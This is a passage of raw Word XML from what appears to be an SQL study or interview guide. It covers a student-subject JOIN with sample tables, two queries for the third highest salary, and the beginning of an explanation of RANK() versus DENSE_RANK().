    <w:p w14:paraId="21F55D0B" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF3547"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We join the Student table (s) and the Subject table (sub) using the Subject_id field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABCD2B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We filter the results to only include rows where the Subject_name is "Mathematics".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEAC56F" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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ample Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA512DB" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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tudent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2"/>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="1033"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="6FAC344E" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D14C2E" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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tudent_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76643469" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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tudent_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3B86B8" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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ubject_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="6C64F2DB" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C5F9118"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="394E09D4"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01DBE821"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="569BE6B0" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C5B697"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76FAB983"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BABBDC5"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="775E6FB4" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EDC9A7"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E5DCBBA"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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F5DAA62"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="3CF72583" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF04133"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="280248A0"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Priya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA8E8C7"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7066D8F2" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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ubject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16"/>
        <w:gridCol w:w="1377"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="1E1414C6" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="349DAB42" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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ubject_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FBFD9D2" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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ubject_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="4F4E0591" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036DAE59"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C64B93"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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="50DEC4B3" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F386A3B"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3250627B"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Science</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="674DA784" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D2CF3D4"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1092B59B"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History</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2920533D" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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Resul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2"/>
        <w:gridCol w:w="1407"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="4AC14501" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58260E4B" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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tudent_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46FF49DC" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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tudent_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="70CF055A" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73810729"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FC9AE5"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="1451CC6D" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510D3672"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02EE8ADC"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Priya</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="211C356A" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176B" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this example, the students who have "Mathematics" as their subject are John and Priya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B3A3F" w14:textId="6249E038"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3E51C6F1">
          <v:rect id="_x0000_i3043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01569A29" w14:textId="7054F45C" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00E53691">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="744" w:name="_Toc196308224"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="0099012D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="0099012D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3rd highest salary of an employee</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="744"/>
    </w:p>
    <w:p w14:paraId="52288CD8" w14:textId="1442C504" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522B" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To get the 3rd highest salary of an employee, you can use different methods in SQL. Here's an example using the LIMIT and OFFSET approach (in MySQL) or using ROW_NUMBER() (in SQL Server, PostgreSQL, Oracle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B009BD" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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1. Using LIMIT and OFFSET (for MySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14729E9C"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SELECT emp_sal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B7F65"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FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61930C6C"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ORDER BY emp_sal DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150770E"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LIMIT 1 OFFSET 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F43C89"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This query sorts the employee salaries in descending order and then skips the first two highest salaries (using OFFSET 2). After that, it selects the next salary, which will be the 3rd highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3358D" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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2. Using ROW_NUMBER() (for SQL Server, PostgreSQL, Oracle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA3DA2"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WITH RankedSalaries AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B60C5"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SELECT emp_sal, ROW_NUMBER() OVER (ORDER BY emp_sal DESC) AS RowNum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC3523"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FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091F7C2D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB7283"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SELECT emp_sal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94CCDA"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FROM RankedSalaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83A90D"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WHERE RowNum = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF93A1A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This query uses the ROW_NUMBER() window function to assign a unique rank to each salary in descending order. Then, it selects the salary where the RowNum is 3, which will give the 3rd highest salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36E450"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Both methods should work depending on the SQL database you're using.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2AD60" w14:textId="3189042A"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4917CFBB">
          <v:rect id="_x0000_i3044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D530B9B" w14:textId="3E278002" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="001075F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="_Toc196308225"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is dense and rank in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
    </w:p>
    <w:p w14:paraId="76FFAE89" w14:textId="529B9826" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522B" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In SQL, DENSE_RANK() and RANK() are both window functions used to assign ranks to rows based on the order of a column. The key difference between them lies in how they handle ties (rows with the same value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D7C7DD" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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1. RANK()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B3A21"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The RANK() function assigns a unique rank to each distinct value in the ordered result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9203D2"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When there are ties (rows with the same value), RANK() skips subsequent rank numbers, meaning it leaves gaps in the ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A93E45"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If two rows have the same value, they will have the same rank, but the next rank will be skipped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6B2A3" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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lastRenderedPageBreak/>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFDB53"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Consider the following dat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8"/>
        <w:gridCol w:w="633"/>
      </w:tblGrid>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="05570613" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="104DDD44" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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ployee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162E3294" w14:textId="77777777" w:rsidR="0090522B" w:rsidRPr="005C1C9E" w:rsidRDefault="0090522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alary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="3A3145D2" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7690C41E"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC09C19"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1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="7D13B6A4" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F5061DC"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Jane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C6DCDC"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="063A6518" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78529FCB"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Jack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C93672"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1200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0090522B" w:rsidRPr="005C1C9E" w14:paraId="4477D930" w14:textId="77777777" w:rsidTr="0090522B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09450D9C"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3927BC84"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1500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D3D9FC"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Using RANK():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E6055"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SELECT Employee, Salary, RANK() OVER (ORDER BY Salary DESC) AS Rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A250CE"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FROM Employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02C3F4"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Outp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8"/>
        <w:gridCol w:w="618"/>
        <w:gridCol w:w="532"/>
      </w:tblGrid>
